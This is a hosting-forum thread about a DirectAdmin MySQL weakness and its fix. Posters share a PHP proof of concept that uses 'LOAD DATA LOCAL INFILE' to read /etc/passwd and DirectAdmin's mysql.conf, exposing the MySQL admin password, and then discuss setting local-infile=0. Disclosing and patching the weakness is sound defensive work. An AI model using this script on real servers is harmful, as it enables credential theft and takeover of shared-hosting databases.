big issue on the mysql by default of directadmin

duke28

duke28

Verified User
Joined
Oct 30, 2005
Messages
304
Location
Montreal - Canada
hi,

do what your want with this post on this forum

but the mysql by default of directadmin

have a big issue..

with mysql and a database with a table, we can find the root sql password ( da_admin )

we can read this : /usr/local/directadmin/conf/mysql.conf

with this command on mysql :
with a file php with like this code =

<?php

//file_get_contents('/etc/passwd');

$l = mysql_connect("localhost", "xxxxxx", "xxxxxxxxx");
mysql_select_db('syscall_qtm',$l);
//mysql_query("DELETE FROM a");
mysql_query("LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE xxxx_xxxx.a");

$result = mysql_query("SELECT a FROM a");
while(list($row) = mysql_fetch_row($result))
print $row . chr(10);

?>

change juste xxxx with all you need, and you can read all file you want on the server..

for protect this issue you need do this :


cd /etc/rc.d/init.d

pico mysqld

and add this to the START LINE :
--local-infile=0


and restart mysqld..

THIS IS A BIG ISSUE..
ANYBODY CAN FIND YOUR DA_ADMIN PASSWORD FOR MYSQL AND DELETE ALL DATABASE ON YOUR SERVER..

the command LOAD DATA LOCAL INFILE need to be disabled in mysql.. because its make no sense..

the example is for /etc/passwd , but all users with this command + mysql can read /usr/local/directadmin/conf/mysql.conf with my example...

( sorry for my english )
 
Last edited:
Is this true?

Will a security update be released for this if its a bug..... o_O
 
And some of you are probably using your mysql password as your admin login to DA and or root. :(
 
Seems like a complete non-issue to me.

Yes, everyone can read /etc/passwd. So what?!? That's what shadow passwords were invented for!!

Furthermore, everyone should not be able to read /usr/local/directadmin/conf/*, because the directory is only readable by the 'diradmin' user and group, and mysql is running in its own user-space. If you've changed the permissions for the 'conf' directory, or have mySQL running as 'root', then I'm sure its of your own doing, and not DA.

Also, the password DirectAdmin automatically assigns to mySQL upon install is randomly generated, so should not be the same as the root/DA admin user on the server.

-Swift
 
It's a known issue, and it was already reported to John few weeks ago (still no answer). You don't need to edit mysqld service start/stop script. Just add this to /etc/my.cnf:
Code: 
local-infile=0
ELS adds it by default.
 
smtalk said:
It's a known issue, and it was already reported to John few weeks ago (still no answer). You don't need to edit mysqld service start/stop script. Just add this to /etc/my.cnf:
Code: 
local-infile=0
ELS adds it by default.
Click to expand...
You sure this will solve the problem?
 
Yes, I am :) And it's not a bug, it's just a functionality of MySQL that needs to be disabled for shared hosting :) (something similar to disable_functions in PHP) :)
 
yea i know its not a bug but one big security issue..

and yes, if the command is not disable into mysql, all users can find how read /usr/local/directadmin/conf/* with mysql !!
 
Last edited:
i dont get it.

so what is the conclusion?

is this a non-issue? meaning, i don't have to do anything or worry about it?

or do i have to change something on my server.
 
hi
you need to add this :

local-infile=0

in /etc/my.cnf

and restart mysqld

because if you dont disable this command someone can read this file : /usr/local/directadmin/conf/mysql.conf and get your da_admin password for phpmyadmin..
 
Users can only read the conf/* files if you have mysql running as 'root' or 'diradmin', which it should not be. My system is running mysql as 'mysql', and I have verified that nothing in the /usr/local/directadmin/conf/ directory is accessible by users in the way you mention. There is no need to cripple mySQL functionality to have a secure system!

-Swift

duke28 said:
hi
you need to add this :

local-infile=0

in /etc/my.cnf

and restart mysqld

because if you dont disable this command someone can read this file : /usr/local/directadmin/conf/mysql.conf and get your da_admin password for phpmyadmin..
Click to expand...
 
its because you dont have test :)

mysql run in the mysql user..

and with the command LOAD DATA LOCAL INFILE we can load the mysql.conf and see the password..
trust me..
 
Im still confused, i do not know who to believe.

Doesn't by default da install, mysql run as user mysql ?

So we don't need to worry about it like Swift said?
 
Nope, sorry. Doesn't work for me. I can load /etc/passwd etc, but nothing in DA's conf/ directory. Are the permissions for your DA conf/ directory set securely (read/write access only to 'diradmin' user)? i.e.

Code: 
# pwd
/usr/local/directadmin
# ls -l | grep conf
drwx------  2 diradmin  diradmin      512 Jul 10 11:44 conf

-Swift
 
Nope, sorry. Doesn't work for me. I can load /etc/passwd etc, but nothing in DA's conf/ directory. Are the permissions for your DA conf/ directory set securely (read/write access only to 'diradmin' user)? i.e.
Click to expand...

yea if you test with just php.. its normal..

but if do your test with the command into mysql :
mysql_query("LOAD DATA LOCAL INFILE '/usr/local/directadmin/conf/mysql.conf' INTO TABLE xxxx_xxxx.a")

its going to work :)

anyway maybe its my bad english.. but i know its working..
if local-infile is active into mysql, i can read /usr/local/directadmin/conf/mysql.conf with mysql4

i have test on many servers !

scripts for read this file:

<?php

//file_get_contents('/etc/passwd');

$l = mysql_connect("localhost", "xxxxxx", "xxxxxxxxx");
mysql_select_db('xxxxx_xxx',$l);
//mysql_query("DELETE FROM a");
mysql_query("LOAD DATA LOCAL INFILE '/usr/local/directadmin/conf/mysql.conf' INTO TABLE xxxx_xxxx.a");

$result = mysql_query("SELECT a FROM a");
while(list($row) = mysql_fetch_row($result))
print $row . chr(10);

?>
Click to expand...

change xxxx with your database infos
 
Last edited:
i tried your following example and it didnt return me anything.
btw i have created the tables and field name like you specified.
i am on mysql 4.1.21
 
oh wait, he is right!!
i WAS ABLE TO GET THE ROOT MYSQL password.

i just created a table name with 1 field, called 'a', and it worked. before i had an ID in there so it was giving me blank!

i just tested this on BOTH mysql 4.1.21 and mysql 5.0.45!!!

this is extremely urgent problem and i wish DA fix this immediately on their custombuild script!

wow, thank you for catching this one.

this is incredibly bad!
 
so im not stupid ??


hihi

cd /etc/rc.d/init.d

pico mysqld

and add this to the START LINE :
--local-infile=0

( change $bindir/mysqld_safe --datadir=$datadir --pid-file=$pid_file >/dev/null 2>&1 &

for this one : $bindir/mysqld_safe --datadir=$datadir --pid-file=$pid_file --local-infile=0 >/dev/null 2>&1 &


and restart mysqld..
Click to expand...

its what i did..

but someone said put local-infile=0 in /etc/my.cnf is ok for disable it..

and when you repeat your test after it .. you need to empty the table..
 
You must log in or register to reply here.
Back
Top